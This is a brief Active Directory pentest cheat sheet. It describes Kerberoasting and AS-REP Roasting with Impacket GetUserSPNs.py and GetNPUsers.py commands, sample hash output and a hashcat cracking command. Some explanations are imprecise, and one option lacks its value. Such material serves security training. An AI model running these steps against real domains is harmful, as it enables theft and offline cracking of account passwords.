Kerberoasting
Kerberoasting is a common AD Attack to obtain AD Tickets that helps with Persistence. In order for this Attack to work, an adversary must have access to Service Principal Name (SPN) Accounts such as IIS User, MSSQL, etc. The Kerberoasting Attack involves Requesting a Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS).
First, we need to find an SPN Account(s), and then we can send a Request to get a TGS Ticket. We can perform the Kerberoasting Attack from Our Machine using the Impacket GetUserSPNs.py Python Script.
Once we find the SPN User, we can send a single request to get a TGS Ticket.
- GetUserSPNs
- Output
:: Find the User
GetUserSPNs.py -dc-ip <IP> <Domain>
:: Request the TGS Ticket
GetUserSPNs.py -dc-ip <IP> <Domain> -request-user <Username>
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- --------- -------- -------------------------- --------- ----------
http/PC-GREEN.DC.GREEN svc-adobe 2022-06-10 05:47:33.796826
[-] CCache File is not Found. Skipping...
$krb5tgs$23$*svc-adobe$DC.GREEN$DC.green/svc-adobe*$[...]$[...]
We can Crack the obtained TGS Ticket using HashCat.
hashcat -a 0 -m 13100 <HASH> <Wordlist>
AS-REP Roasting
List of Domain AccountsAS-REP Roasting is the Technique that Enables the Attacker to retrieve Password Hashes for AD Users whose Account options have been set to Do not Require Kerberos Pre-Authentication.
This option relies on the old Kerberos Authentication Protocol, which allows Authentication without a Password. Once we obtain the Hashes, we can try to Crack it Offline. Before performing the AS-REP Roasting, we need a List of Domain Accounts that should be gathered during Enumeration.
- Get-NPUsers
- Output
GetNPUsers.py -format -dc-ip <IP> <Domain> -usersfile <File with Domain Account Names>
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$victim@PC.GREEN:bca0eed41e12ab01f57de41d87ed356b$[...]
[-] User PC-GREEN$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]